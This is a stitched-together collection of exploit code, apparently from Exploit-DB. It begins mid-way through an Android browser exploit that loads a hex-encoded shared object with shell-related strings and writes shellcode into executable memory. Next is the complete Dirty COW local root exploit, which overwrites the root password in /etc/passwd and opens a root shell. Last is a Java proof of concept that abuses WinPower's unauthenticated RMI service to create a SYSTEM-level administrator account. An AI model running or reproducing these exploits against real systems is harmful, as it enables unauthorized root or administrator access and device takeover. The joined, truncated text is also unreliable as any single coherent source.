06c6f67202d74206578706c6f69742060706d206c697374207061636b61676560006c6f67202d74206578706c6f697420606c73202e2f600069702069732025732c706f7274206973202564003137322e31362e3130312e3300636f6e6e656374207375636365737366756c6c79002f73797374656d2f62696e2f736800504154483d2f73797374656d2f62696e3a2f73797374656d2f7862696e3a2f62696e3a2f7573722f62696e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008006000003000000b42f00000200000080000000170000002c0500001400000011000000110000001c05000012000000100000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000b80200000a000000bb010000040000007404000001000000f900000001000000010100000100000009010000010000001601000001000000250100000100000031010000010000003e010000010000004a010000010000005c010000010000007901000001000000860100000100000092010000010000009b0100000e000000b10100001a000000882e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac050000ac05000000300000004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c024403727368656c6c2e736f0000006158a70b002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578746162002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b00000002000000480100004801000070010000030000000100000004000000100000001b0000000300000002000000b8020000b8020000bb010000000000000000000001000000000000002300000005000000020000007404000074040000a8000000020000000000000004000000040000002900000009000000020000001c0500001c05000010000000020000000000000004000000080000003200000009000000020000002c0500002c0500008000000002000000070000000400000008000000360000000100000006000000ac050000ac050000d4000000000000000000000004000000000000003b00000001000000060000008006000080060000f006000000000000000000000400000000000000410000000100000002000000700d0000700d000054000000000000000000000004000000000000004c0000000100007082000000c40d0000c40d000058000000080000000000000004000000080000005700000001000000320000001c0e00001c0e0000e5030000000000000000000001000000010000005f0000000f00000003000000882e0000881e000004000000000000000000000004000000000000006b00000006000000030000008c2e00008c1e00002801000003000000000000000400000008000000740000000100000003000000b42f0000b41f00004c00000000000000000000000400000000000000790000000100000003000000003000000020000004000000000000000000000004000000000000007f000000080000000300000004300000042000000400000000000000000000000400000000000000840000000100000030000000000000000420000010000000000000000000000001000000010000008d000000070000000000000000000000142000001c00000000000000000000000400000000000000a4000000030000700000000000000000302000003e00000000000000000000000100000000000000b40000000100000000000000000000006e2000001000000000000000000000000100000000000000010000000300000000000000000000007e200000c300000000000000000000000100000000000000";function write_shellcode(dlsym_addr,buffer){
//ldr r0,[pc,4]//0xe59f0004
//ldr r1,[pc,4]//0xe59f1004
//b shellcode;//0xea000001
//dlopen_addr//normalArrayBufferBackingStore
//dlsym_addr
//shellcode
//var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];
var stub=[0xe59f0004,0xe59f1004,0xea000001,normalArrayBufferBackingStore,normalArrayBufferLength];
var dv = get_dateview(buffer);
for(var i=0;i<stub.length;i++){
get_dateview(buffer).setUint32(i*4,stub[i],true);
}
dv =get_dateview(buffer+stub.length*4);
for(var i=0;i<shellcode.length;i++){
dv.setUint8(i,shellcode[i]);
}
return stub.length*4+shellcode.length;
}
function backup_original_code(start_address){
var backup_arr = [];
for(var i=0;i<shellcode.length+4096;i++){
backup_arr[i]=get_dateview(start_address).getUint8(i);
}
return backup_arr;
}
function restore_original_code(start_address,backup_arr){
for(var i=0;i<shellcode.length+4096;i++){
get_dateview(start_address).setUint8(i,backup_arr[i]);
}
}
var backup_arr=backup_original_code(rwxAddress);
var writed_len = write_shellcode(dlsym_addr,rwxAddress);
var args_view = new DataView(normalArrayBuffer,0,32);
var so_file_view = new DataView(normalArrayBuffer,4096);
var js_view = new DataView(normalArrayBuffer,0x100000);
args_view.setUint32(0,dlsym_addr+12,true);
args_view.setUint32(4,dlsym_addr,true);
args_view.setUint32(8,rwxAddress,true);
args_view.setUint32(12,writed_len,true);
args_view.setUint32(16,normalArrayBufferBackingStore+4096,true);
args_view.setUint32(20,so_str.length/2,true);
//args_view.setUint32(24,normalArrayBufferBackingStore+0x100000,true);
//args_view.setUint32(28,js_str.length,true);
log("length is "+so_str.length);
for(var i=0;i<so_str.length;i+=2){
var value = so_str.substr(i,2);
value = "0x"+value;
so_file_view.setUint8(i/2,parseInt(value));
}
huge_func({});
restore_original_code(rwxAddress,backup_arr);
/*setInterval(function () {
document.getElementById("message").innerHTML=
String.fromCharCode.apply(null, new Uint8Array(normalArrayBuffer,128,3000));
//log(String.fromCharCode.apply(null, new Uint8Array(normalArrayBuffer,128,1024)));
}, 1000);*/
</script>
</html>
// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
//
// -----------------------------------------------------------------
// Copyright (C) 2016 Gabriele Bonacini
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 3 of the License, or
// (at your option) any later version.
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software Foundation,
// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
// -----------------------------------------------------------------
#include <iostream>
#include <fstream>
#include <string>
#include <thread>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>
#include <pty.h>
#include <string.h>
#include <termios.h>
#include <sys/wait.h>
#include <signal.h>
#define BUFFSIZE 1024
#define PWDFILE "/etc/passwd"
#define BAKFILE "./.ssh_bak"
#define TMPBAKFILE "/tmp/.ssh_bak"
#define PSM "/proc/self/mem"
#define ROOTID "root:"
#define SSHDID "sshd:"
#define MAXITER 300
#define DEFPWD "$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/"
#define TXTPWD "dirtyCowFun\n"
#define DISABLEWB "echo 0 > /proc/sys/vm/dirty_writeback_centisecs\n"
#define EXITCMD "exit\n"
#define CPCMD "cp "
#define RMCMD "rm "
using namespace std;
class Dcow{
private:
bool run, rawMode, opShell, restPwd;
void *map;
int fd, iter, master, wstat;
string buffer, etcPwd, etcPwdBak,
root, user, pwd, sshd;
thread *writerThr, *madviseThr, *checkerThr;
ifstream *extPwd;
ofstream *extPwdBak;
struct passwd *userId;
pid_t child;
char buffv[BUFFSIZE];
fd_set rfds;
struct termios termOld, termNew;
ssize_t ign;
void exitOnError(string msg);
public:
Dcow(bool opSh, bool rstPwd);
~Dcow(void);
int expl(void);
};
Dcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),
iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),
madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr),
child(0){
userId = getpwuid(getuid());
user.append(userId->pw_name).append(":");
extPwd = new ifstream(PWDFILE);
while (getline(*extPwd, buffer)){
buffer.append("\n");
etcPwdBak.append(buffer);
if(buffer.find(root) == 0){
etcPwd.insert(0, root).insert(root.size(), pwd);
etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(),
buffer.begin() + buffer.find(":", root.size()), buffer.end());
}else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){
etcPwd.insert(0, buffer);
}else{
etcPwd.append(buffer);
}
}
extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);
extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());
extPwdBak->close();
fd = open(PWDFILE,O_RDONLY);
map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);
}
Dcow::~Dcow(void){
extPwd->close();
close(fd);
delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;
if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);
if(child != 0) wait(&wstat);
}
void Dcow::exitOnError(string msg){
cerr << msg << endl;
// if(child != 0) kill(child, SIGKILL);
throw new exception();
}
int Dcow::expl(void){
madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });
writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR);
while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET);
ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }
});
checkerThr = new thread([&](){ while(iter <= MAXITER){
extPwd->clear(); extPwd->seekg(0, ios::beg);
buffer.assign(istreambuf_iterator<char>(*extPwd),
istreambuf_iterator<char>());
if(buffer.find(pwd) != string::npos &&
buffer.size() >= etcPwdBak.size()){
run = false; break;
}
iter ++; usleep(300000);
}
run = false;
});
cerr << "Running ..." << endl;
madviseThr->join();
writerThr->join();
checkerThr->join();
if(iter <= MAXITER){
child = forkpty(&master, nullptr, nullptr, nullptr);
if(child == -1) exitOnError("Error forking pty.");
if(child == 0){
execlp("su", "su", "-", nullptr);
exitOnError("Error on exec.");
}
if(opShell) cerr << "Password overridden to: " << TXTPWD << endl;
memset(buffv, 0, BUFFSIZE);
ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading su prompt.");
cerr << "Received su prompt (" << buffv << ")" << endl;
if(write(master, TXTPWD, strlen(TXTPWD)) <= 0)
exitOnError("Error writing pwd on tty.");
if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0)
exitOnError("Error writing cmd on tty.");
if(!opShell){
if(write(master, EXITCMD, strlen(EXITCMD)) <= 0)
exitOnError("Error writing exit cmd on tty.");
}else{
if(restPwd){
string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(" ").append(PWDFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd on tty.");
restoreCmd = string(RMCMD).append(TMPBAKFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd (rm) on tty.");
}
if(tcgetattr(STDIN_FILENO, &termOld) == -1 )
exitOnError("Error getting terminal attributes.");
termNew = termOld;
termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));
if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)
exitOnError("Error setting terminal in non-canonical mode.");
rawMode = true;
while(true){
FD_ZERO(&rfds);
FD_SET(master, &rfds);
FD_SET(STDIN_FILENO, &rfds);
if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )
exitOnError("Error on select tty.");
if(FD_ISSET(master, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) break;
if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)
exitOnError("Error writing on stdout.");
}
if(FD_ISSET(STDIN_FILENO, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading from stdin.");
if(write(master, buffv, bytes_read) != bytes_read) break;
}
}
}
}
return [](int ret, bool shell){
string msg = shell ? "Exit.\n" : string("Root password is: ") + TXTPWD + "Enjoy! :-)\n";
if(ret <= MAXITER){cerr << msg; return 0;}
else{cerr << "Exploit failed.\n"; return 1;}
}(iter, opShell);
}
void printInfo(char* cmd){
cerr << cmd << " [-s] [-n] | [-h]\n" << endl;
cerr << " -s open directly a shell, if the exploit is successful;" << endl;
cerr << " -n combined with -s, doesn't restore the passwd file." << endl;
cerr << " -h print this synopsis;" << endl;
cerr << "\n If no param is specified, the program modifies the passwd file and exits." << endl;
cerr << " A copy of the passwd file will be create in the current directory as .ssh_bak" << endl;
cerr << " (unprivileged user), if no parameter or -n is specified.\n" << endl;
exit(1);
}
int main(int argc, char** argv){
const char flags[] = "shn";
int c;
bool opShell = false,
restPwd = true;
opterr = 0;
while ((c = getopt(argc, argv, flags)) != -1){
switch (c){
case 's':
opShell = true;
break;
case 'n':
restPwd = false;
break;
case 'h':
printInfo(argv[0]);
break;
default:
cerr << "Invalid parameter." << endl << endl;
printInfo(argv[0]);
}
}
if(!restPwd && !opShell){
cerr << "Invalid parameter: -n requires -s" << endl << endl;
printInfo(argv[0]);
}
Dcow dcow(opShell, restPwd);
return dcow.expl();
}
// Exploit Title: WinPower V4.9.0.4 Privilege Escalation
// Date: 29-11-2016
// Software Link: http://www.ups-software-download.com/
// Exploit Author: Kacper Szurek
// Contact: http://twitter.com/KacperSzurek
// Website: http://security.szurek.pl/
// Category: local
/*
1. Description
UPSmonitor runs as SYSTEM process.
We can communicate with monitor using RMI interface.
In manager app there’s an “Administrator” password check, but the password isn’t verified inside monitor process.
So we can modify any application settings without knowing administrator password.
What is more interesting we can set command which will be executed when monitor get “remote shutdown command”.
Because monitor runs as SYSTEM process, this command is also executed with SYSTEM privileges.
So using this we can create new administrator account.
http://security.szurek.pl/winpower-v4904-privilege-escalation.html
2. Proof of Concept
*/
/*
WinPower V4.9.0.4 Privilege Escalation
Download: http://www.ups-software-download.com/
by Kacper Szurek
http://security.szurek.pl/
*/
import com.adventnet.snmp.snmp2.*;
import java.io.*;
import wprmi.SimpleRMIInterface;
public class WinPowerExploit {
private static String command_path = System.getProperty("user.dir") + "\\command.bat";
private static String command_username = "wpexploit";
private static void send_snmp_packet(String IP, SnmpPDU sendPDU) throws SnmpException {
SnmpAPI api = new SnmpAPI();
api.setCharacterEncoding("UTF-8");
api.start();
SnmpSession session = new SnmpSession(api);
session.open();
session.setPeername(IP);
session.setRemotePort(2199);
session.send(sendPDU);
}
public static void sendShutdownCommand(String agentIP) throws SnmpException {
SnmpPDU pdu2 = new SnmpPDU();
pdu2.setCommand((byte) -92);
SnmpOID oid = new SnmpOID(".1.3.6.1.2.1.33.1.6.3.25.0");
pdu2.setEnterprise(oid);
byte dataType = 4;
SnmpVar var = SnmpVar.createVariable("", dataType);
SnmpVarBind varbind = new SnmpVarBind(oid, var);
pdu2.addVariableBinding(varbind);
send_snmp_packet(agentIP, pdu2);
}
private static void create_command_file() throws IOException {
Writer writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(command_path), "utf-8"));
writer.write("net user " + command_username + " /add\n");
writer.write("net localgroup administrators " + command_username + " /add\n");
writer.write("net stop UPSmonitor");
writer.close();
}
private static String exec_cmd(String cmd) throws java.io.IOException {
Process proc = Runtime.getRuntime().exec(cmd);
java.io.InputStream is = proc.getInputStream();
java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
String val = "";
if (s.hasNext()) {
val = s.next();
} else {
val = "";
}
return val;
}
private static boolean is_user_exist() throws IOException {
String output = exec_cmd("net user");
return output.contains(command_username);
}
public static void main(String[] args) {
try {
System.out.println("WinPower V4.9.0.4 Privilege Escalation");
System.out.println("by Kacper Szurek");
System.out.println("http://security.szurek.pl/");
String is_service_started = exec_cmd("sc query UPSmonitor");
if (!is_service_started.contains("RUNNING")) {
System.out.println("[-] Monitor service not running");
System.exit(0);
}
create_command_file();
System.out.println("[*] Create shutdown command: " + command_path);
wprmi.SimpleRMIInterface myServerObject = (SimpleRMIInterface) java.rmi.Naming.lookup("rmi://127.0.0.1:2099/SimpleRMIImpl");
String root_password = myServerObject.getDataString(29, 1304, -1, 0);
System.out.println("[+] Get root password: " + root_password);
System.out.println("[+] Enable running command on shutdown");
myServerObject.setData(29, 262, 1, "", -1L, 0);
System.out.println("[+] Set shutdown command path");
myServerObject.setData(29, 235, -1, command_path, -1L, 0);
System.out.println("[+] Set execution as SYSTEM");
myServerObject.setData(29, 203, 0, "", -1L, 0);
System.out.println("[+] Allow remote shutdown");
myServerObject.setData(29, 263, 1, "", -1L, 0);
System.out.println("[+] Add localhost as remote shutdown agent");
myServerObject.setData(29, 299, -1, "127.0.0.1 ", -1L, 0);
System.out.println("[+] Set delay to 999");
myServerObject.setData(29, 236, 999, "", -1L, 0);
System.out.println("[+] Send shutdown command");
sendShutdownCommand("127.0.0.1");
System.out.print("[+] Waiting for admin account creation");
int i = 0;
while (i < 15) {
if (is_user_exist()) {
System.out.println("\n[+] Account created, now login as: " + command_username);
System.exit(0);
break;
} else {
System.out.print(".");
Thread.sleep(2000);
}
i += 1;
}
System.out.print("\n[-] Exploit failed, admin account not created");
System.exit(1);
} catch (Exception e) {
System.out.println("\n[-] Error: " + e.getMessage());
}
}
}
// Compiled Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40848.class